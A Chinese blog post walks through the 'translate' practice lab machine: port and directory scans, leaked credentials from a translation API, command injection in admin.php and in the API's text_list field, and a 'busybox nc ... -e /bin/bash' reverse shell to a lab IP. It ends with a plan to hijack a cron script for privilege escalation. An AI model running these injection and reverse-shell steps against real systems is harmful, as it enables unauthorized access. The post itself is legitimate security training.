

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="https://kcide.asia/PicGo/20250521164813069.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="XCDH">
  <meta name="keywords" content="">
  
    <meta name="description" content="一.信息收集：1.1 端口扫描：1234567891011121314151617181920212223242526272829303132┌──(root㉿kali)-[~]└─# nmap -sV -A -p- 192.168.122.117Starting Nmap 7.95 ( https:&#x2F;&#x2F;nmap.org ) at 2025-06-02 08:55 EDTNmap scan rep">
<meta property="og:type" content="article">
<meta property="og:title" content="translate靶机复盘">
<meta property="og:url" content="http://example.com/2025/06/02/translate%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%9B%98/index.html">
<meta property="og:site_name" content="XCDH">
<meta property="og:description" content="一.信息收集：1.1 端口扫描：1234567891011121314151617181920212223242526272829303132┌──(root㉿kali)-[~]└─# nmap -sV -A -p- 192.168.122.117Starting Nmap 7.95 ( https:&#x2F;&#x2F;nmap.org ) at 2025-06-02 08:55 EDTNmap scan rep">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-00-24.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-04-07.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-02-28.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-30-00.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-34-23.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-02_21-45-48.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-03_23-26-43.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-03_23-27-47.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-03_23-39-57.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-03_23-39-57.png">
<meta property="og:image" content="http://example.com/img/Snipaste_2025-06-04_00-43-37.png">
<meta property="article:published_time" content="2025-06-02T12:57:48.000Z">
<meta property="article:modified_time" content="2025-06-03T16:50:39.251Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="复盘">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/Snipaste_2025-06-02_21-00-24.png">
  
  
  
  <title>translate靶机复盘 - XCDH</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>XCDH</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://kcide.asia/PicGo/20250521153237608.jpeg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="translate靶机复盘"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-06-02 20:57" pubdate>
          2025年6月2日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          15 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">translate靶机复盘</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="一-信息收集："><a href="#一-信息收集：" class="headerlink" title="一.信息收集："></a>一.信息收集：</h2><h4 id="1-1-端口扫描："><a href="#1-1-端口扫描：" class="headerlink" title="1.1 端口扫描："></a>1.1 端口扫描：</h4><figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs nix">┌──(root㉿kali)-[~]<br>└─<span class="hljs-comment"># nmap -sV -A -p- 192.168.122.117</span><br>Starting Nmap <span class="hljs-number">7.95</span> ( https:<span class="hljs-symbol">//nmap.org</span> ) at <span class="hljs-number">202</span>5-<span class="hljs-number">0</span>6-<span class="hljs-number">02</span> <span class="hljs-number">08</span>:<span class="hljs-number">55</span> EDT<br>Nmap scan report for <span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span><br>Host is up (<span class="hljs-number">0.00052</span>s latency).<br>Not <span class="hljs-params">shown:</span> <span class="hljs-number">65532</span> closed tcp ports (reset)<br>PORT     STATE SERVICE VERSION<br><span class="hljs-number">22</span><span class="hljs-symbol">/tcp</span>   open  ssh     OpenSSH <span class="hljs-number">8.4</span>p1 Debian <span class="hljs-number">5</span><span class="hljs-operator">+</span>deb11u3 (protocol <span class="hljs-number">2.0</span>)<br>| <span class="hljs-params">ssh-hostkey:</span> <br>|   <span class="hljs-number">3072</span> f6:a3:b6:<span class="hljs-number">78</span>:c4:<span class="hljs-number">62</span>:af:<span class="hljs-number">44</span>:bb:<span class="hljs-number">1</span>a:a0:<span class="hljs-number">0</span>c:<span class="hljs-number">08</span>:<span class="hljs-number">6</span>b:<span class="hljs-number">98</span>:f7 (RSA)<br>|   <span class="hljs-number">256</span> bb:e8:a2:<span class="hljs-number">31</span>:d4:<span class="hljs-number">05</span>:a9:c9:<span class="hljs-number">31</span>:ff:<span class="hljs-number">62</span>:f6:<span class="hljs-number">32</span>:<span class="hljs-number">84</span>:<span class="hljs-number">21</span>:<span class="hljs-number">9</span>d (ECDSA)<br>|_  <span class="hljs-number">256</span> <span class="hljs-number">3</span>b:ae:<span class="hljs-number">34</span>:<span class="hljs-number">64</span>:<span class="hljs-number">4</span>f:a5:<span class="hljs-number">75</span>:b9:<span class="hljs-number">4</span>a:b9:<span class="hljs-number">81</span>:f9:<span class="hljs-number">89</span>:<span class="hljs-number">76</span>:<span class="hljs-number">99</span>:eb (ED25519)<br><span class="hljs-number">80</span><span class="hljs-symbol">/tcp</span>   open  http    Apache httpd <span class="hljs-number">2.4</span>.<span class="hljs-number">62</span> ((Debian))<br>|<span class="hljs-params">_http-title:</span> \xE6\x88\x91\xE7\x9A\x84\xE9\xA1\xB5\xE9\x9D\xA2<br>|<span class="hljs-params">_http-server-header:</span> Apache<span class="hljs-symbol">/2.4.62</span> (Debian)<br><span class="hljs-number">5001</span><span class="hljs-symbol">/tcp</span> open  http    Werkzeug httpd <span class="hljs-number">3.1</span>.<span class="hljs-number">3</span> (Python <span class="hljs-number">3.9</span>.<span class="hljs-number">2</span>)<br>|<span class="hljs-params">_http-server-header:</span> Werkzeug<span class="hljs-symbol">/3.1.3</span> Python<span class="hljs-symbol">/3.9.2</span><br>|<span class="hljs-params">_http-title:</span> <span class="hljs-number">405</span> Method Not Allowed<br>MAC <span class="hljs-params">Address:</span> <span class="hljs-number">08</span>:<span class="hljs-number">00</span>:<span class="hljs-number">27</span>:<span class="hljs-number">6</span>D:<span class="hljs-number">4</span>E:<span class="hljs-number">8</span>B (PCS Systemtechnik<span class="hljs-symbol">/Oracle</span> VirtualBox virtual NIC)<br>Device <span class="hljs-params">type:</span> general purpose|router<br><span class="hljs-params">Running:</span> Linux <span class="hljs-number">4</span>.X|<span class="hljs-number">5</span>.X, MikroTik RouterOS <span class="hljs-number">7</span>.X<br>OS <span class="hljs-params">CPE:</span> cpe:<span class="hljs-operator">/</span>o:linux:linux_kernel:<span class="hljs-number">4</span> cpe:<span class="hljs-operator">/</span>o:linux:linux_kernel:<span class="hljs-number">5</span> cpe:<span class="hljs-operator">/</span>o:mikrotik:routeros:<span class="hljs-number">7</span> cpe:<span class="hljs-operator">/</span>o:linux:linux_kernel:<span class="hljs-number">5.6</span>.<span class="hljs-number">3</span><br>OS <span class="hljs-params">details:</span> Linux <span class="hljs-number">4.15</span> <span class="hljs-operator">-</span> <span class="hljs-number">5.19</span>, OpenWrt <span class="hljs-number">21.02</span> (Linux <span class="hljs-number">5.4</span>), MikroTik RouterOS <span class="hljs-number">7.2</span> <span class="hljs-operator">-</span> <span class="hljs-number">7.5</span> (Linux <span class="hljs-number">5.6</span>.<span class="hljs-number">3</span>)<br>Network <span class="hljs-params">Distance:</span> <span class="hljs-number">1</span> hop<br>Service <span class="hljs-params">Info:</span> <span class="hljs-params">OS:</span> Linux; <span class="hljs-params">CPE:</span> cpe:<span class="hljs-operator">/</span>o:linux:linux_kernel<br><br>TRACEROUTE<br>HOP RTT     ADDRESS<br><span class="hljs-number">1</span>   <span class="hljs-number">0.52</span> ms <span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span><br><br>OS and Service detection performed. Please report any incorrect results at https:<span class="hljs-operator">//</span>nmap.org<span class="hljs-operator">/</span>submit<span class="hljs-symbol">/</span> .<br>Nmap <span class="hljs-params">done:</span> <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned <span class="hljs-keyword">in</span> <span class="hljs-number">32.34</span> seconds<br></code></pre></td></tr></table></figure>

<p>比之前的靶机多扫了一个5001的端口，老样子还是先看web界面,检查了一下源代码，没有什么线索。</p>
<p><img src="/./img/Snipaste_2025-06-02_21-00-24.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="1-2-目录扫描："><a href="#1-2-目录扫描：" class="headerlink" title="1.2 目录扫描："></a>1.2 目录扫描：</h4><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">┌──(root㉿kali)-[~]<br><span class="hljs-section">└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://192.168.122.117/  -x php txy zip</span><br><span class="hljs-section">===============================================================</span><br>Gobuster v3.6<br><span class="hljs-section">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</span><br><span class="hljs-section">===============================================================</span><br>[+] Url:                     http://192.168.122.117/<br>[+] Method:                  GET<br>[+] Threads:                 10<br>[+] Wordlist:                /usr/share/wordlists/dirb/common.txt<br>[+] Negative Status codes:   404<br>[+] User Agent:              gobuster/3.6<br>[+] Extensions:              php<br>[+] Timeout:                 10s<br>===============================================================<br>Starting gobuster in directory enumeration mode<br>===============================================================<br>/.php                 (Status: 403) [Size: 280]<br>/.hta.php             (Status: 403) [Size: 280]<br>/.hta                 (Status: 403) [Size: 280]<br>/.htaccess            (Status: 403) [Size: 280]<br>/.htpasswd.php        (Status: 403) [Size: 280]<br>/.htpasswd            (Status: 403) [Size: 280]<br>/.htaccess.php        (Status: 403) [Size: 280]<br>/admin.php            (Status: 200) [Size: 1833]<br>/admin.php            (Status: 200) [Size: 1833]<br>/index.html           (Status: 200) [Size: 2131]<br>/server-status        (Status: 403) [Size: 280]<br><span class="hljs-section">Progress: 9228 / 9230 (99.98%)</span><br><span class="hljs-section">===============================================================</span><br><span class="hljs-section">Finished</span><br><span class="hljs-section">===============================================================</span><br><br><br><br>┌──(root㉿kali)-[~]<br><span class="hljs-section">└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://192.168.122.117:5001/  -x php txy zip</span><br><span class="hljs-section">===============================================================</span><br>Gobuster v3.6<br><span class="hljs-section">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</span><br><span class="hljs-section">===============================================================</span><br>[+] Url:                     http://192.168.122.117:5001/<br>[+] Method:                  GET<br>[+] Threads:                 10<br>[+] Wordlist:                /usr/share/wordlists/dirb/common.txt<br>[+] Negative Status codes:   404<br>[+] User Agent:              gobuster/3.6<br>[+] Extensions:              php<br>[+] Timeout:                 10s<br>===============================================================<br>Starting gobuster in directory enumeration mode<br>===============================================================<br>/info                 (Status: 200) [Size: 12462]<br><span class="hljs-section">Progress: 9228 / 9230 (99.98%)</span><br><span class="hljs-section">===============================================================</span><br><span class="hljs-section">Finished</span><br><span class="hljs-section">===============================================================</span><br></code></pre></td></tr></table></figure>

<h2 id="二-getshell："><a href="#二-getshell：" class="headerlink" title="二. getshell："></a>二. getshell：</h2><p>发现个登录界面，试了一下弱口令，没有什么效果</p>
<p><img src="/./img/Snipaste_2025-06-02_21-04-07.png" srcset="/img/loading.gif" lazyload></p>
<p>在5001的端口上发现可以使用API进行翻译，利用一下这个API看看能不能翻译出什么东西</p>
<p><img src="/./img/Snipaste_2025-06-02_21-02-28.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="方式一："><a href="#方式一：" class="headerlink" title="方式一："></a>方式一：</h4><figure class="highlight scilab"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs scilab">&#123;<span class="hljs-string">&quot;translations&quot;</span>:[&#123;<span class="hljs-string">&quot;detected_sour┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST </span><br><span class="hljs-string">&#123;&quot;</span>error<span class="hljs-string">&quot;:&quot;</span><span class="hljs-number">415</span> Unsupported Media Type: Did not attempt to load JSON data because the request Content-Type was not <span class="hljs-string">&#x27;application/json&#x27;</span>.<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string"></span><br><span class="hljs-string">┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST -H &#x27;</span>Content-Type: application/json<span class="hljs-string">&#x27;</span><br><span class="hljs-string">&#123;&quot;</span>error<span class="hljs-string">&quot;:&quot;</span><span class="hljs-number">400</span> Bad Request: The browser (or proxy) sent a request that this server could not understand.<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string">┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST -H &#x27;</span>Content-Type: application/json<span class="hljs-string">&#x27; -d &#x27;</span>&#123;<span class="hljs-string">&quot;key&quot;</span>: <span class="hljs-string">&quot;value&quot;</span>&#125;<span class="hljs-string">&#x27;</span><br><span class="hljs-string">&#123;&quot;</span>error<span class="hljs-string">&quot;:&quot;</span>Missing required field: source_lang<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string">┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST -H &#x27;</span>Content-Type: application/json<span class="hljs-string">&#x27; -d &#x27;</span>&#123;<span class="hljs-string">&quot;source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>&#125;<span class="hljs-string">&#x27;</span><br><span class="hljs-string">&#123;&quot;</span>error<span class="hljs-string">&quot;:&quot;</span>Missing required field: target_lang<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string">┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST -H &#x27;</span>Content-Type: application/json<span class="hljs-string">&#x27; -d &#x27;</span>&#123;<span class="hljs-string">&quot;source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>,<span class="hljs-string">&quot;target_lang&quot;</span>:<span class="hljs-string">&quot;zh-cn&quot;</span>&#125;<span class="hljs-string">&#x27;</span><br><span class="hljs-string">&#123;&quot;</span>error<span class="hljs-string">&quot;:&quot;</span>Missing required field: text_list<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string">┌──(root㉿kali)-[~]</span><br><span class="hljs-string">└─# curl http://192.168.122.117:5001 -X POST -H &#x27;</span>Content-Type: application/json<span class="hljs-string">&#x27; -d &#x27;</span>&#123;<span class="hljs-string">&quot;source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>,<span class="hljs-string">&quot;target_lang&quot;</span>:<span class="hljs-string">&quot;zh-cn&quot;</span>,<span class="hljs-string">&quot;text_list&quot;</span>:[<span class="hljs-string">&quot;就你也想要账号？？？？&quot;</span>]&#125;<span class="hljs-string">&#x27;</span><br><span class="hljs-string"></span><br><span class="hljs-string">&#123;&quot;</span>translations<span class="hljs-string">&quot;:[&#123;&quot;</span>detected_source_lang<span class="hljs-string">&quot;:&quot;</span>en<span class="hljs-string">&quot;,&quot;</span>text<span class="hljs-string">&quot;:&quot;</span>welcome:<span class="hljs-number">7</span>h1515P4zzw0Rd<span class="hljs-string">&quot;&#125;]&#125;</span><br><span class="hljs-string">ce_lang&quot;</span>:<span class="hljs-string">&quot;a&quot;</span>,<span class="hljs-string">&quot;text&quot;</span>:<span class="hljs-string">&quot;welcome:7h1515P4zzw0Rd&quot;</span>&#125;]&#125;<br><br><span class="hljs-comment">//curl参数：</span><br>-X: 指定 HTTP 请求的方法<br>-H: 设置请求头（Header）信息<br>-d: 发送 POST 请求的表单数据<br></code></pre></td></tr></table></figure>

<p>得到了账号 welcome:7h1515P4zzw0Rd 进行登录admi.php，是个命令注入，执行反弹shell即可（注意：靶机没有nc命令，需要使用busybox）</p>
<p><img src="/./img/Snipaste_2025-06-02_21-30-00.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">busybox</span> nc <span class="hljs-number">192.168.122.222</span> <span class="hljs-number">4444</span> -e /bin/bash <br></code></pre></td></tr></table></figure>

<p><img src="/./img/Snipaste_2025-06-02_21-34-23.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="方式二："><a href="#方式二：" class="headerlink" title="方式二："></a>方式二：</h4><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ada">┌──(root㉿kali)-[~]<br>└─# curl http://<span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span>:<span class="hljs-number">5001</span> -X POST -H <span class="hljs-symbol">&#x27;Content</span>-<span class="hljs-keyword">Type</span>: application/json&#x27; -d &#x27;&#123;<span class="hljs-string">&quot;source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>,<span class="hljs-string">&quot;target_lang&quot;</span>:<span class="hljs-string">&quot;zh-cn&quot;</span>,<span class="hljs-string">&quot;text_list&quot;</span>:[<span class="hljs-string">&quot;id&quot;</span>]&#125;&#x27;<br>&#123;<span class="hljs-string">&quot;translations&quot;</span>:[&#123;<span class="hljs-string">&quot;detected_source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>,<span class="hljs-string">&quot;text&quot;</span>:<span class="hljs-string">&quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)\n&quot;</span>&#125;]&#125;<br></code></pre></td></tr></table></figure>

<p>发现也可以命令注入，使用反弹shell进行连接</p>
<figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs haskell">┌──(root㉿kali)-[~]<br>└─# curl http://<span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span>:<span class="hljs-number">5001</span> -<span class="hljs-type">X</span> <span class="hljs-type">POST</span> -<span class="hljs-type">H</span> &#x27;<span class="hljs-type">Content</span>-<span class="hljs-type">Type</span>: application/json&#x27; -d &#x27;&#123;<span class="hljs-string">&quot;source_lang&quot;</span>:<span class="hljs-string">&quot;en&quot;</span>,<span class="hljs-string">&quot;target_lang&quot;</span>:<span class="hljs-string">&quot;zh-cn&quot;</span>,<span class="hljs-string">&quot;text_list&quot;</span>:[<span class="hljs-string">&quot;busybox nc 192.168.122.222 4444 -e /bin/bash &quot;</span>]&#125;&#x27;<br><br><br>┌──(root㉿kali)-[~]<br>└─# nc -lvp <span class="hljs-number">4444</span><br><span class="hljs-title">listening</span> on [any] <span class="hljs-number">4444</span> ...<br><span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span>: inverse host lookup failed: <span class="hljs-type">Unknown</span> host<br><span class="hljs-title">connect</span> to [<span class="hljs-number">192.168</span>.<span class="hljs-number">122.222</span>] from (<span class="hljs-type">UNKNOWN</span>) [<span class="hljs-number">192.168</span>.<span class="hljs-number">122.117</span>] <span class="hljs-number">60908</span><br><span class="hljs-title">id</span><br><span class="hljs-title">uid</span>=<span class="hljs-number">33</span>(www-<span class="hljs-class"><span class="hljs-keyword">data</span>) gid=33(<span class="hljs-title">www</span>-<span class="hljs-title">data</span>) groups=33(<span class="hljs-title">www</span>-<span class="hljs-title">data</span>)</span><br></code></pre></td></tr></table></figure>



<h2 id="三-权限提升："><a href="#三-权限提升：" class="headerlink" title="三 . 权限提升："></a>三 . 权限提升：</h2><p> user.flag:</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs elixir">www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home</span><span class="hljs-variable">$ </span>cd welcome/<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home/welcome</span><span class="hljs-variable">$ </span>ls<br>py  user.txt<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home/welcome</span><span class="hljs-variable">$ </span>cat user.txt <br>flag&#123;user<span class="hljs-number">-51860845</span><span class="hljs-number">-225</span>a<span class="hljs-number">-42</span>f3-b492<span class="hljs-number">-0</span>a63bc722a96&#125;<br></code></pre></td></tr></table></figure>

<p>SUDO，SUID等提权方式都看过了，没有什么能利用的点，再看一下计划任务，传入pspy64s ，发现有text.sh文件在执行计划任务</p>
<p><img src="/./img/Snipaste_2025-06-02_21-45-48.png" srcset="/img/loading.gif" lazyload></p>
<p>思路：在text.sh中写下定时反弹shell的任务，等待反弹</p>
